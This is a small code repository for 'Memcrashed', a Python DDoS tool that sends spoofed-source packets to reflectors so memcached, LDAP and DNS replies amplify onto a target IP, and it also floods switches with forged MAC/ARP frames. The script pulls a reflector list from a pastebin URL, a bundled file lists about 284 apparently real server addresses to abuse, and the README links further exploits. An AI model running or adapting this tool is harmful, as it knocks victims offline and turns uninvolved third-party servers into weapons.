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/Memcrashed.py:
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1 | from scapy.all import *
2 | import sys, datetime, argparse, urllib2, threading
3 | print("""
4 |
5 | :::!~!!!!!:.
6 | .xUHWH!! !!?M88WHX:.
7 | .X*#M@$!! !X!M$$$$$$WWx:.
8 | :!!!!!!?H! :!$!$$$$$$$$$$8X:
9 | !!~ ~:~!! :~!$!#$$$$$$$$$$8X:
10 | :!~::!H!< ~.U$X!?R$$$$$$$$MM!
11 | ~!~!!!!~~ .:XW$$$U!!?$$$$$$RMM!
12 | !:~~~ .:!M"T#$$$$WX??#MRRMMM!
13 | ~?WuxiW*` `"#$$$$8!!!!??!!!
14 | :X- M$$$$ `"T#$T~!8$WUXU~
15 | :%` ~#$$$m: ~!~ ?$$$$$$
16 | :!`.- ~T$$$$8xx. .xWW- ~""##*"
17 | ..... -~~:<` ! ~?T#$$@@W@*?$$ /`
18 | W$@@M!!! .!~~ !! .:XUW$W!~ `"~: :
19 | #"~~`.:x%`!! !H: !WM$$$$Ti.: .!WUn+!`
20 | :::~:!!`:X~ .: ?H.!u "$$$B$$$!W:U!T$$M~
21 | .~~ :X@!.-~ ?@WTWo("*$$$W$TH$! `
22 | Wi.~!X$?!-~ : ?$$$B$Wu("**$RM!
23 | $R@i.~~ ! : ~$$$$$B$$en:``
24 | ?MXT@Wx.~ : ~"##*$$$$M~
25 |
26 | """)
27 | print(datetime.datetime.now())
28 |
29 | parser = argparse.ArgumentParser()
30 | parser.add_argument("-A", help="1 - Memcrashed | 2 - LDAP | 3 - DNS | 4 - MAC Flodding")
31 | parser.add_argument("-T", help="Target")
32 | parser.add_argument("-F", help="File amplification")
33 | parser.add_argument("-Thread", default=10, help="Thread")
34 | parser.add_argument("-N", default=40, help="Number of packages")
35 | args = parser.parse_args()
36 |
37 | def sends(data, port):
38 | global servers
39 | global current
40 | amp = servers[current]
41 | current = current + 1
42 | packet = send(IP(dst=amp, src=target)/UDP(dport=port)/Raw(load=data), count=int(powers))
43 |
44 | def macflood(target, powers):
45 | sendp(Ether(src=RandMAC(), dst=target )/ARP(op=2, psrc="0.0.0.0", hwdst=target)/Padding(load="X"*18), count=int(powers))
46 |
47 |
48 | print("""
49 |
50 | 1. Memcrashed: -A 1 -T xx.xx.xx.xx -F bot.txt -N 40 -Thread 10
51 | 2. LDAP: -A 2 -T xx.xx.xx.xx -F bot.txt -N 40 -Thread 10
52 | 3. DNS: -A 3 -T xx.xx.xx.xx -F bot.txt -N 40 -Thread 10
53 | 4. Mac-flood: -A 4 -T FFFF.FFFF.FFFF -N 40 -Thread 10
54 |
55 | """)
56 |
57 | req = urllib2.urlopen('https://pastebin.com/raw/eSCHTTVu')
58 | f = open('bot.txt', 'w')
59 | print('Bots are uploaded to the bot.txt file.')
60 | f.write(req.read())
61 | f.close()
62 |
63 | attack = args.A
64 | target = args.T
65 | server = args.F
66 | powers = args.N
67 | numthreads = int(args.Thread)
68 |
69 | servers = []
70 | current = 0
71 | with open(server) as f:
72 | servers = f.readlines()
73 |
74 | countserver = int(len(servers))
75 | if(numthreads > countserver):
76 | print('You have entered a floor more than servers.')
77 | print('Servers: '+ str(countserver))
78 | exit(0)
79 |
80 |
81 | data = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
82 |
83 | dns = "\xc4\x75\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\xff\x00\x01\x00\x00\x29\x23\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
84 |
85 |
86 | ldap = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a"
87 | ldap += "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01"
88 | ldap += "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65"
89 | ldap += "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00"
90 | ldap += "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e"
91 | ldap += "\x65\x74\x6c\x6f\x67\x6f\x6e"
92 |
93 |
94 | def threads(numthreads, arg1, arg2):
95 | threads = []
96 | for n in range(numthreads):
97 | thread = threading.Thread(target=sends, args=(arg1, arg2))
98 | thread.daemon = True
99 | thread.start()
100 | time.sleep(1)
101 |
102 | threads.append(thread)
103 |
104 | if(len(sys.argv) < 4) or (target == None) or (server == None) or (attack == None):
105 | print('You run the script without parameters')
106 | elif(attack == '1'):
107 | threads(numthreads, data, 11211)
108 | elif(attack == '2'):
109 | threads(numthreads, ldap, 389)
110 | elif(attack == '3'):
111 | threads(numthreads, dns, 53)
112 | elif(attack == '4'):
113 | threads(numthreads, target, powers)
114 |
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/Ntpbot.txt:
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1 | 5.96.37.44
2 | 2.236.137.89
3 | 1.59.3.238
4 | 37.48.80.59
5 | 31.185.29.2
6 | 37.57.147.1
7 | 27.35.20.217
8 | 24.124.0.251
9 | 50.202.101.46
10 | 50.200.226.243
11 | 27.115.15.5
12 | 41.21.148.1
13 | 41.226.249.187
14 | 50.137.77.191
15 | 50.203.120.98
16 | 46.253.228.1
17 | 57.67.40.3
18 | 58.27.172.35
19 | 58.142.206.34
20 | 58.56.161.34
21 | 58.140.119.162
22 | 58.53.209.29
23 | 58.16.195.122
24 | 58.16.192.58
25 | 58.19.231.146
26 | 59.70.88.122
27 | 58.250.87.84
28 | 60.5.206.41
29 | 61.115.203.10
30 | 60.199.52.5
31 | 61.135.24.11
32 | 50.203.217.137
33 | 60.13.190.126
34 | 62.52.51.157
35 | 64.85.171.71
36 | 62.213.6.26
37 | 61.156.240.162
38 | 60.211.253.214
39 | 61.180.217.70
40 | 66.172.249.12
41 | 61.153.146.213
42 | 61.6.229.138
43 | 62.24.235.113
44 | 62.159.207.21
45 | 65.122.50.238
46 | 69.31.111.162
47 | 69.1.153.205
48 | 72.37.178.130
49 | 66.182.208.104
50 | 65.48.174.139
51 | 68.149.146.5
52 | 69.1.153.193
53 | 74.5.236.88
54 | 77.104.216.153
55 | 78.130.200.135
56 | 77.104.225.34
57 | 79.77.161.78
58 | 78.244.53.185
59 | 80.13.78.60
60 | 80.14.54.185
61 | 80.11.80.189
62 | 75.145.44.88
63 | 81.90.177.4
64 | 80.15.204.254
65 | 81.56.43.23
66 | 82.127.29.15
67 | 82.85.56.150
68 | 82.165.135.47
69 | 82.165.155.178
70 | 83.103.78.210
71 | 82.130.156.207
72 | 83.149.226.3
73 | 82.151.222.185
74 | 83.221.231.74
75 | 84.16.29.6
76 | 83.143.86.202
77 | 86.34.138.90
78 | 87.116.196.117
79 | 87.210.151.139
80 | 87.229.9.178
81 | 89.29.244.33
82 | 89.43.120.1
83 | 89.43.120.30
84 | 88.34.144.194
85 | 89.252.37.198
86 | 88.41.36.75
87 | 91.93.35.161
88 | 91.195.60.93
89 | 91.205.204.22
90 | 92.63.48.50
91 | 91.205.204.14
92 | 84.94.204.249
93 | 93.89.223.254
94 | 93.63.164.76
95 | 100.3.61.77
96 | 98.143.205.97
97 | 96.43.253.245
98 | 95.62.86.136
99 | 95.87.22.1
100 | 94.249.60.194
101 | 111.9.12.92
102 | 111.175.231.78
103 | 111.175.231.114
104 | 109.98.19.81
105 | 110.249.133.213
106 | 111.9.12.30
107 | 111.9.12.220
108 | 111.12.150.178
109 | 111.195.124.9
110 | 112.95.255.38
111 | 111.195.124.11
112 | 112.214.16.240
113 | 112.217.139.226
114 | 112.95.255.37
115 | 113.28.84.181
116 | 113.29.246.42
117 | 114.80.236.91
118 | 113.57.208.30
119 | 115.78.226.86
120 | 115.42.241.8
121 | 115.84.177.8
122 | 115.169.16.252
123 | 118.142.46.238
124 | 115.160.137.156
125 | 117.79.71.126
126 | 118.98.106.2
127 | 118.232.80.104
128 | 117.137.59.1
129 | 119.44.223.3
130 | 119.6.96.27
131 | 119.74.216.157
132 | 119.9.64.67
133 | 121.33.199.36
134 | 121.122.15.246
135 | 119.184.119.218
136 | 119.4.210.104
137 | 122.53.100.100
138 | 119.55.252.67
139 | 122.226.152.98
140 | 118.232.68.85
141 | 124.115.212.12
142 | 122.136.195.79
143 | 122.155.78.2
144 | 124.5.69.254
145 | 124.137.207.106
146 | 123.205.251.33
147 | 124.95.140.231
148 | 124.126.251.121
149 | 124.126.251.109
150 | 124.164.235.70
151 | 124.164.235.80
152 | 125.214.218.84
153 | 125.40.102.81
154 | 146.255.16.4
155 | 146.255.16.33
156 | 162.17.199.180
157 | 173.14.28.25
158 | 170.56.58.53
159 | 140.207.192.198
160 | 172.245.43.197
161 | 173.10.255.49
162 | 146.255.16.34
163 | 151.7.85.174
164 | 173.241.143.1
165 | 173.164.246.13
166 | 176.104.1.163
167 | 173.255.23.139
168 | 178.162.199.135
169 | 178.168.4.50
170 | 178.235.4.6
171 | 177.91.131.234
172 | 177.68.156.123
173 | 179.109.192.20
174 | 178.162.199.134
175 | 180.8.36.114
176 | 182.172.114.5
177 | 182.148.234.250
178 | 173.255.23.134
179 | 182.140.145.242
180 | 180.250.75.197
181 | 183.78.237.4
182 | 187.35.126.175
183 | 188.64.32.145
184 | 187.121.200.12
185 | 188.64.35.105
186 | 186.224.202.220
187 | 187.188.81.196
188 | 186.233.59.254
189 | 186.215.146.186
190 | 186.238.48.5
191 | 186.231.96.188
192 | 187.84.205.70
193 | 187.84.205.66
194 | 189.194.232.93
195 | 190.7.220.46
196 | 190.160.2.22
197 | 187.58.64.50
198 | 186.200.55.250
199 | 190.120.198.166
200 | 192.221.117.53
201 | 190.180.162.136
202 | 183.232.116.14
203 | 194.2.25.236
204 | 193.189.224.45
205 | 193.232.248.6
206 | 194.226.58.158
207 | 199.83.189.175
208 | 194.8.71.48
209 | 195.146.152.67
210 | 195.182.193.193
211 | 195.50.4.121
212 | 194.190.200.200
213 | 198.187.189.69
214 | 200.30.85.115
215 | 200.52.174.70
216 | 195.116.53.235
217 | 199.216.35.12
218 | 200.94.160.70
219 | 195.222.181.165
220 | 199.203.55.10
221 | 200.52.193.185
222 | 200.141.239.172
223 | 200.98.238.2
224 | 200.206.118.50
225 | 196.21.236.210
226 | 201.166.184.2
227 | 201.220.233.21
228 | 202.108.158.18
229 | 202.38.109.3
230 | 202.56.215.161
231 | 206.54.223.135
232 | 201.91.120.139
233 | 202.101.163.107
234 | 205.128.68.5
235 | 202.21.117.218
236 | 202.175.178.226
237 | 202.162.48.55
238 | 202.160.39.214
239 | 203.115.128.68
240 | 203.125.8.181
241 | 205.172.16.115
242 | 207.198.118.90
243 | 203.128.25.70
244 | 207.8.77.133
245 | 203.211.133.133
246 | 208.84.48.56
247 | 208.84.48.55
248 | 208.81.85.106
249 | 209.84.16.5
250 | 203.135.38.211
251 | 209.213.223.18
252 | 208.81.85.103
253 | 205.197.88.10
254 | 211.69.162.25
255 | 210.160.97.242
256 | 212.91.231.118
257 | 212.91.251.217
258 | 212.239.111.61
259 | 212.46.206.31
260 | 216.215.210.186
261 | 216.68.100.65
262 | 218.56.41.228
263 | 219.112.132.139
264 | 219.81.17.202
265 | 218.26.99.162
266 | 218.222.200.50
267 | 218.201.239.248
268 | 218.108.129.133
269 | 218.240.38.245
270 | 218.27.180.19
271 | 220.200.148.246
272 | 221.0.78.203
273 | 221.2.84.203
274 | 220.249.97.172
275 | 220.247.194.254
276 | 220.248.191.27
277 | 221.2.253.165
278 | 221.9.161.242
279 | 222.134.32.38
280 | 222.76.242.9
281 | 222.251.171.44
282 | 221.204.230.208
283 | 223.30.121.177
284 | 83.27.169.156
285 |
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/README.md:
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1 | # Memcrashed
2 | Version 0.1
3 |
4 | 1. Memcached amlification
5 | 2. DNS amlification
6 | 3. LDAP amlification
7 | 4. Mac-flooding
8 |
9 | Linux - UTF-8
10 |
11 | Windows 7 - Windows 10
12 |
13 | Exploit 1 - https://github.com/649/Memcrashed-DDoS-Exploit
14 |
15 | Exploit 2 - https://pastebin.com/ZiUeinae
16 |
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